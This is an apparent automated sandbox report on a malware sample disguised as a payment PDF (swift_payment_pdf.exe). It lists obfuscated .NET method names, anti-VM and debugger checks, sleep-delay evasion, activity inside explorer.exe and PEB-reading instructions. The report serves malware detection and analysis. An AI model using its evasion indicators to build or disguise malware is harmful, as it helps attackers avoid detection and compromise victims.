            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, daegRmAWcvMi7SAWgp.csHigh entropy of concatenated method names: 'XpWa5yeDsf', 'FkYaOayHxK', 'VsDa6RnfBF', 'LcNa0f2k8u', 'zUrammaW8I', 'HgIa1idsL0', 'okGayxkN4O', 'IjWajUktVV', 'H47aA7GGI6', 'UMlaQFwZYg'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, K22sTI10TLEnmqFWQX.csHigh entropy of concatenated method names: 'YUYeCpfrvI', 'RTWeo4HwIW', 'Yc3eu5lqX6', 'HKYeYjwxvJ', 'bCSeGhAgq5', 'sbLerkFsBh', 'ytPe3Bb9Bw', 'QIKiKmFW2U', 'Fw3iJGSGWS', 'gJHi4D3lgA'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, NwqgU75Q3WklKJuK95.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nP0W4OxP5l', 'd8YWD2k32e', 'mqtWz658GJ', 'IIsoFgVfsZ', 'sgmoCYRfi2', 'dOPoWLcX99', 's3boo7Kved', 'ENAREod8kUaM2fjv8QD'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, Vvei5OXXISPxIy8J1T.csHigh entropy of concatenated method names: 'ze8rUG52X7', 'TZCrEyXMt8', 'KpgM1Ib6xZ', 'g48MyZo04L', 'SFWMjDsCiQ', 'jljMAKspLE', 'ImXMQFTtji', 'vCeM945VRP', 'rN4MxPmy3s', 'E33M5b4odi'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, VYn5ZC04Xh7blNpXED.csHigh entropy of concatenated method names: 'rwFG6ovSWi', 'Po3G0xKlfr', 'pHwGT44cKu', 'FQ6GNRALcV', 'dotGS5jaVg', 'SweGwBfuV8', 'wd7GKSSVSA', 'g8cGJVbkJW', 'XTEG4GlbjI', 'ReLGDL1mbS'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, cT6mCptZsNYngMt5JL.csHigh entropy of concatenated method names: 'ifZiYt5nBV', 'OrFiG8bgeG', 'JD6iMTY0LF', 'lVdir2TfeQ', 'L39i3y5lIH', 'xggivMUHp3', 'Lr1iVMfDVt', 'WpqiRkqiIF', 'AYEiZPC092', 'Ym3ipZmv03'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, nn0dYmoWlVmAMqLHuC.csHigh entropy of concatenated method names: 'bttvbwMgxi', 'awlvHLm0EO', 'xnFv2K6ui4', 'gAmvIfhHno', 'agDvUNfShe', 'uj4vkMuqgS', 'BnDvE4c1Ds', 'sNcvc2xZgV', 'xT0vtsuvh0', 'UUmvgCBJ53'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, kOBUaOVQ5piXnJWiuMJ.csHigh entropy of concatenated method names: 'XLJebiWVLv', 'bLNeHEjHX4', 'y53e2oH5Kx', 'vKneImBco9', 'TlYeU7loXO', 'YXxekCGHkK', 'SWjeEc3BZq', 'bcOecqTlIu', 'aoLet7Uih7', 'MhLegSAfd2'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, y1ibDTrE6BWROJqcoa.csHigh entropy of concatenated method names: 'ecOXVfxcpSZuDEQX1K0', 'BmFMNyx0WUDGPduZsrP', 'DN03iu0pPG', 'oMl3evicDL', 'HUh3XgwfhO', 'PwywRbx9FVNqFtTBIIb', 'oqXm7Gx2HsLR2ftqWhJ'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, yOwvLKV6yBbqRyw99XL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xcRX6FIBL7', 'iBYX064Bur', 'PvRXTLg7BR', 'QeEXNiQdck', 'zZNXSmK2bc', 'KF9Xwsw1HD', 'agQXKdHsyw'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, nfiGd2JckkN7waNTNT.csHigh entropy of concatenated method names: 'ewovYVxtMs', 'kA2vMpVPS7', 'bXdv3eAkRt', 'i1u3DvEhZ9', 'mJ73z5Ypmc', 'HejvF6BHEy', 'ruBvCxQm8j', 'RPYvWxjX8C', 'XtpvoxGhBd', 'rBJvuO7TKN'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, hf2GnK73C7uyAUGYyh.csHigh entropy of concatenated method names: 'QwtsZnVaeZ', 'WdEspxHysN', 'ToString', 'IfBsYd5Qxi', 'XeGsGSvYZa', 'kw2sM0SROh', 'u95srltRrL', 'n6Ws3oWXO2', 'b2fsvDyMd5', 'QXtsVJP97A'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, snC1gDPdXbxgOUtoyd.csHigh entropy of concatenated method names: 'Dispose', 'mjJC4NEZC4', 'fYQWmpMnEw', 'OFDddP2HL4', 'DUwCDhTH8v', 'UHNCzrWP4o', 'ProcessDialogKey', 'qImWFpqVxo', 'DboWCyBqyT', 'EXvWWgo6AU'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, HNAg6nCmQTk1mWUs0C.csHigh entropy of concatenated method names: 'uSa2iUhf5', 'S8XItdyp5', 'K3Akd8TUH', 'maAEck55X', 'hwetZNdHS', 'npVghv2wL', 'bQFcD8aEv9mCcu1osi', 'KGdQ5UbAAaH9XptG5u', 'raLiFs1Vp', 'mxPXw5vmv'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, zMjFbSkaBuf7I5WL3T.csHigh entropy of concatenated method names: 'MxTsJb09KA', 'UVfsDJEPip', 'io8iFwJOpe', 'W3RiCVZfWR', 'FuxsBHim4t', 'C5bsOwe0PM', 'gijsPtL16k', 'GmJs6BefUr', 'YY3s05cyhL', 'x0IsTyXQNM'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, YUErdkgo3QAl0D7abE.csHigh entropy of concatenated method names: 'H13MIMLG73', 'cXJMknL97g', 'NolMc6JNQ3', 'Dy4MttfLdo', 'Rb9MauwUuP', 'MIXMlJa1pp', 'aOoMspROZh', 'DjwMiNvDQf', 'KNYMetbsPf', 'TdFMXNKCwj'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, SVDkUhBLLGiaL3Zguc.csHigh entropy of concatenated method names: 'zrx3hsUjAD', 'QTe3bY3D7G', 'cXk32asFeZ', 'nhI3IyA8xu', 'cZh3kMSg8h', 'Qyq3E6ARIP', 'O9j3tRGN6f', 'MBR3gjN2V0', 'z0Fjf1xuUTRgowbIeHH', 'iI0fp7xXxHQiyndJOAw'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, DsPhWEG7fYA6PrMRVN.csHigh entropy of concatenated method names: 'Yt6ofm4K6L', 'ObfoYNiHkr', 'TBloGlK2vH', 'ksooM0XNdg', 'iFiorEhXWM', 'gjco3r2tpu', 'SNEov1HTuI', 'ptRoVdQlrJ', 'CpVoRH3cE3', 'YMMoZduy4J'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, uagZMlT2PRIcd5mHmc.csHigh entropy of concatenated method names: 'pP53fMfPhH', 'i4b3Gqo91k', 'glL3rh3CXW', 'Ppu3vxUSn7', 'Wop3V5ZkCn', 'KKArSeXIpo', 'RkdrwgUJFX', 'SCXrK18yog', 'miVrJe2sL1', 'aXhr4ICuDu'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, FaEFox84HGc74nOAsU.csHigh entropy of concatenated method names: 'dqmqccBDIZ', 'Pg1qtF2JXo', 'd4yqLsYyII', 'WD2qmThoOZ', 'I2Oqyo40GS', 'EKbqjo3tNr', 'HBMqQMxfwL', 'Rd9q9nrq1i', 'MeFq5xa4yG', 'cVNqB6ouG8'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, aONjcELFZUjJUNTQZU.csHigh entropy of concatenated method names: 'wbyCvZxAgt', 'STyCVKXv3y', 'suqCZcYZL6', 'zWjCpLiFdT', 'al2CaGpZrT', 'OOAClsVBdE', 'vBI8E9I2CZZELYyZi1', 'GYIJDI5TPD3typy6pQ', 'GCpCCe8u5W', 'PM0CoRf5ZR'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, JMdMrPaRA1fNwKBYnF.csHigh entropy of concatenated method names: 'NetiLesb88', 'n4Fim9Q3LG', 'Sbji1hs4GD', 'sKHiyhUHHg', 'OQki6e3DL4', 'YkSijt5L2w', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, daegRmAWcvMi7SAWgp.csHigh entropy of concatenated method names: 'XpWa5yeDsf', 'FkYaOayHxK', 'VsDa6RnfBF', 'LcNa0f2k8u', 'zUrammaW8I', 'HgIa1idsL0', 'okGayxkN4O', 'IjWajUktVV', 'H47aA7GGI6', 'UMlaQFwZYg'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, K22sTI10TLEnmqFWQX.csHigh entropy of concatenated method names: 'YUYeCpfrvI', 'RTWeo4HwIW', 'Yc3eu5lqX6', 'HKYeYjwxvJ', 'bCSeGhAgq5', 'sbLerkFsBh', 'ytPe3Bb9Bw', 'QIKiKmFW2U', 'Fw3iJGSGWS', 'gJHi4D3lgA'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, NwqgU75Q3WklKJuK95.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nP0W4OxP5l', 'd8YWD2k32e', 'mqtWz658GJ', 'IIsoFgVfsZ', 'sgmoCYRfi2', 'dOPoWLcX99', 's3boo7Kved', 'ENAREod8kUaM2fjv8QD'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, Vvei5OXXISPxIy8J1T.csHigh entropy of concatenated method names: 'ze8rUG52X7', 'TZCrEyXMt8', 'KpgM1Ib6xZ', 'g48MyZo04L', 'SFWMjDsCiQ', 'jljMAKspLE', 'ImXMQFTtji', 'vCeM945VRP', 'rN4MxPmy3s', 'E33M5b4odi'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, VYn5ZC04Xh7blNpXED.csHigh entropy of concatenated method names: 'rwFG6ovSWi', 'Po3G0xKlfr', 'pHwGT44cKu', 'FQ6GNRALcV', 'dotGS5jaVg', 'SweGwBfuV8', 'wd7GKSSVSA', 'g8cGJVbkJW', 'XTEG4GlbjI', 'ReLGDL1mbS'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, cT6mCptZsNYngMt5JL.csHigh entropy of concatenated method names: 'ifZiYt5nBV', 'OrFiG8bgeG', 'JD6iMTY0LF', 'lVdir2TfeQ', 'L39i3y5lIH', 'xggivMUHp3', 'Lr1iVMfDVt', 'WpqiRkqiIF', 'AYEiZPC092', 'Ym3ipZmv03'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, nn0dYmoWlVmAMqLHuC.csHigh entropy of concatenated method names: 'bttvbwMgxi', 'awlvHLm0EO', 'xnFv2K6ui4', 'gAmvIfhHno', 'agDvUNfShe', 'uj4vkMuqgS', 'BnDvE4c1Ds', 'sNcvc2xZgV', 'xT0vtsuvh0', 'UUmvgCBJ53'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, kOBUaOVQ5piXnJWiuMJ.csHigh entropy of concatenated method names: 'XLJebiWVLv', 'bLNeHEjHX4', 'y53e2oH5Kx', 'vKneImBco9', 'TlYeU7loXO', 'YXxekCGHkK', 'SWjeEc3BZq', 'bcOecqTlIu', 'aoLet7Uih7', 'MhLegSAfd2'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, y1ibDTrE6BWROJqcoa.csHigh entropy of concatenated method names: 'ecOXVfxcpSZuDEQX1K0', 'BmFMNyx0WUDGPduZsrP', 'DN03iu0pPG', 'oMl3evicDL', 'HUh3XgwfhO', 'PwywRbx9FVNqFtTBIIb', 'oqXm7Gx2HsLR2ftqWhJ'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, yOwvLKV6yBbqRyw99XL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xcRX6FIBL7', 'iBYX064Bur', 'PvRXTLg7BR', 'QeEXNiQdck', 'zZNXSmK2bc', 'KF9Xwsw1HD', 'agQXKdHsyw'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, nfiGd2JckkN7waNTNT.csHigh entropy of concatenated method names: 'ewovYVxtMs', 'kA2vMpVPS7', 'bXdv3eAkRt', 'i1u3DvEhZ9', 'mJ73z5Ypmc', 'HejvF6BHEy', 'ruBvCxQm8j', 'RPYvWxjX8C', 'XtpvoxGhBd', 'rBJvuO7TKN'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, hf2GnK73C7uyAUGYyh.csHigh entropy of concatenated method names: 'QwtsZnVaeZ', 'WdEspxHysN', 'ToString', 'IfBsYd5Qxi', 'XeGsGSvYZa', 'kw2sM0SROh', 'u95srltRrL', 'n6Ws3oWXO2', 'b2fsvDyMd5', 'QXtsVJP97A'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, snC1gDPdXbxgOUtoyd.csHigh entropy of concatenated method names: 'Dispose', 'mjJC4NEZC4', 'fYQWmpMnEw', 'OFDddP2HL4', 'DUwCDhTH8v', 'UHNCzrWP4o', 'ProcessDialogKey', 'qImWFpqVxo', 'DboWCyBqyT', 'EXvWWgo6AU'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, HNAg6nCmQTk1mWUs0C.csHigh entropy of concatenated method names: 'uSa2iUhf5', 'S8XItdyp5', 'K3Akd8TUH', 'maAEck55X', 'hwetZNdHS', 'npVghv2wL', 'bQFcD8aEv9mCcu1osi', 'KGdQ5UbAAaH9XptG5u', 'raLiFs1Vp', 'mxPXw5vmv'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, zMjFbSkaBuf7I5WL3T.csHigh entropy of concatenated method names: 'MxTsJb09KA', 'UVfsDJEPip', 'io8iFwJOpe', 'W3RiCVZfWR', 'FuxsBHim4t', 'C5bsOwe0PM', 'gijsPtL16k', 'GmJs6BefUr', 'YY3s05cyhL', 'x0IsTyXQNM'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, YUErdkgo3QAl0D7abE.csHigh entropy of concatenated method names: 'H13MIMLG73', 'cXJMknL97g', 'NolMc6JNQ3', 'Dy4MttfLdo', 'Rb9MauwUuP', 'MIXMlJa1pp', 'aOoMspROZh', 'DjwMiNvDQf', 'KNYMetbsPf', 'TdFMXNKCwj'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, SVDkUhBLLGiaL3Zguc.csHigh entropy of concatenated method names: 'zrx3hsUjAD', 'QTe3bY3D7G', 'cXk32asFeZ', 'nhI3IyA8xu', 'cZh3kMSg8h', 'Qyq3E6ARIP', 'O9j3tRGN6f', 'MBR3gjN2V0', 'z0Fjf1xuUTRgowbIeHH', 'iI0fp7xXxHQiyndJOAw'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, DsPhWEG7fYA6PrMRVN.csHigh entropy of concatenated method names: 'Yt6ofm4K6L', 'ObfoYNiHkr', 'TBloGlK2vH', 'ksooM0XNdg', 'iFiorEhXWM', 'gjco3r2tpu', 'SNEov1HTuI', 'ptRoVdQlrJ', 'CpVoRH3cE3', 'YMMoZduy4J'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, uagZMlT2PRIcd5mHmc.csHigh entropy of concatenated method names: 'pP53fMfPhH', 'i4b3Gqo91k', 'glL3rh3CXW', 'Ppu3vxUSn7', 'Wop3V5ZkCn', 'KKArSeXIpo', 'RkdrwgUJFX', 'SCXrK18yog', 'miVrJe2sL1', 'aXhr4ICuDu'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, FaEFox84HGc74nOAsU.csHigh entropy of concatenated method names: 'dqmqccBDIZ', 'Pg1qtF2JXo', 'd4yqLsYyII', 'WD2qmThoOZ', 'I2Oqyo40GS', 'EKbqjo3tNr', 'HBMqQMxfwL', 'Rd9q9nrq1i', 'MeFq5xa4yG', 'cVNqB6ouG8'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, aONjcELFZUjJUNTQZU.csHigh entropy of concatenated method names: 'wbyCvZxAgt', 'STyCVKXv3y', 'suqCZcYZL6', 'zWjCpLiFdT', 'al2CaGpZrT', 'OOAClsVBdE', 'vBI8E9I2CZZELYyZi1', 'GYIJDI5TPD3typy6pQ', 'GCpCCe8u5W', 'PM0CoRf5ZR'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, JMdMrPaRA1fNwKBYnF.csHigh entropy of concatenated method names: 'NetiLesb88', 'n4Fim9Q3LG', 'Sbji1hs4GD', 'sKHiyhUHHg', 'OQki6e3DL4', 'YkSijt5L2w', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, daegRmAWcvMi7SAWgp.csHigh entropy of concatenated method names: 'XpWa5yeDsf', 'FkYaOayHxK', 'VsDa6RnfBF', 'LcNa0f2k8u', 'zUrammaW8I', 'HgIa1idsL0', 'okGayxkN4O', 'IjWajUktVV', 'H47aA7GGI6', 'UMlaQFwZYg'
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: swift_payment_pdf.exe PID: 7344, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: 14C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: 4EC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: 7ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: 8ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: 9090000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: A090000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: A400000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: B400000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: C400000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: D400000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: E400000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: F400000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: FAD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0139096E rdtsc 5_2_0139096E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 2939Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 7033Jump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe TID: 7364Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 8064Thread sleep count: 2939 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 8064Thread sleep time: -5878000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 8064Thread sleep count: 7033 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 8064Thread sleep time: -14066000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe TID: 8096Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F0BF90 FindFirstFileW,FindNextFileW,FindClose,7_2_02F0BF90
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003209000.00000004.00000020.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000002.3554351518.00000000006CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000009.00000002.2538395340.000002860C8BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0139096E rdtsc 5_2_0139096E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_00417A13 LdrLoadDll,5_2_00417A13
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01380124 mov eax, dword ptr fs:[00000030h]5_2_01380124
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424164 mov eax, dword ptr fs:[00000030h]5_2_01424164
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424164 mov eax, dword ptr fs:[00000030h]5_2_01424164
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FA118 mov ecx, dword ptr fs:[00000030h]5_2_013FA118
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FA118 mov eax, dword ptr fs:[00000030h]5_2_013FA118
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FA118 mov eax, dword ptr fs:[00000030h]5_2_013FA118
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FA118 mov eax, dword ptr fs:[00000030h]5_2_013FA118
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h]5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE10E mov ecx, dword ptr fs:[00000030h]5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h]5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h]5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE10E mov ecx, dword ptr fs:[00000030h]5_2_013FE10E
